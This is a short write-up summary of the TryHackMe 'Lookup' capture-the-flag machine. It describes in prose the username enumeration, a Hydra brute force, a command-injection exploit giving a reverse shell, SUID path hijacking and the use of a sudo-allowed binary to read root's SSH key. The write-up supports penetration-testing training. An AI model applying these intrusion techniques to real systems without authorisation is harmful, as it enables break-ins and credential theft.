From Basic Enumeration to Root | TryHackMe Lookup

In this post, we have a TryHackMe boot-to-root machine named lookup. In this machine, we go through the typical steps by starting with Nmap scanning and enumeration. We find a login form. We decided to create a python script to find the correct username and then use Hydra to find the password. After successful authentication, we have a file manager hosted on a subdomain and the version of this web application is vulnerable to a php command injection. The exploit can be run through Metasploit to obtain initial foothold as www-data. We move horizontally first by exploiting a misconfigured Linux binary then we use GTFObins to obtain root.

Offensive Security Certified Professional Study Notes and Guide

This is a 1562 pages of notes that will guide and help you prepare for and pass the OSCP exam taking into account the…

HackTheBox Certified Penetration Testing Specialist (CPTS) Study Notes

Table of content:- About the CPTS exam- Tips to prepare- Recommended HackTheBox machines to practice- Information…

1. Initial Scanning

• The presenter starts with an Nmap scan to identify open ports and services on the target machine. The scan reveals:
• Port 22: SSH
• Port 80: HTTP
• Aggressive scanning is used since this is a test environment, avoiding triggering production firewalls.

2. Web Application Enumeration

• Accessing the web service on port 80 reveals a login form. The domain is added to the host file for accessibility.
• Attempts are made to log in using default credentials (admin:admin), but they fail.
• Using Burp Suite, the presenter intercepts HTTP requests and identifies differences in server responses for valid and invalid usernames and passwords.

3. Brute Force Attack

• A Python script is created to enumerate valid usernames using server responses.
• The script identifies two valid usernames: admin and Jose.
• Hydra is used to brute-force the password for the user Jose, resulting in the discovery of the password: password123.

4. Exploitation of the Web Application

• After logging in as Jose, the interface displays a file manager with various files.
• The presenter identifies a file named credentials, containing a username (think) but no password.
• Information about the web application (Linder) reveals it is vulnerable to exploitation.
• Using SearchSploit, the presenter finds an exploit matching the application’s version and uses it to gain a reverse shell on the machine.

5. Privilege Escalation

• The initial shell runs as the www-data user. The goal is to escalate to think and then root.
• Exploring the system reveals a SUID binary named pwm. This binary executes commands with elevated privileges.
• By creating a fake id command, the presenter tricks pwm into believing it is running as think. This grants access to think‘s home directory and a file named passwords.

6. Further Enumeration and Root Escalation

• Using the discovered passwords, Hydra brute-forces SSH credentials for think.
• Logging in as think, enumeration reveals the user can execute a binary (look) as root.
• The binary allows accessing sensitive files, including the root user’s private SSH key.
• Using the key, the presenter logs in as root and retrieves both user and root flags.

Key Techniques Demonstrated

• Reconnaissance: Utilizing Nmap and Burp Suite for initial scans and enumeration.
• Brute Forcing: Using custom scripts and tools like Hydra to discover credentials.
• Exploitation: Identifying and exploiting vulnerabilities using tools like SearchSploit.
• Privilege Escalation: Employing creative methods like SUID binary exploitation and file access to gain root access.

TryHackMe Lookup | Room Answers

Room answers can be found here.

Video Walkthrough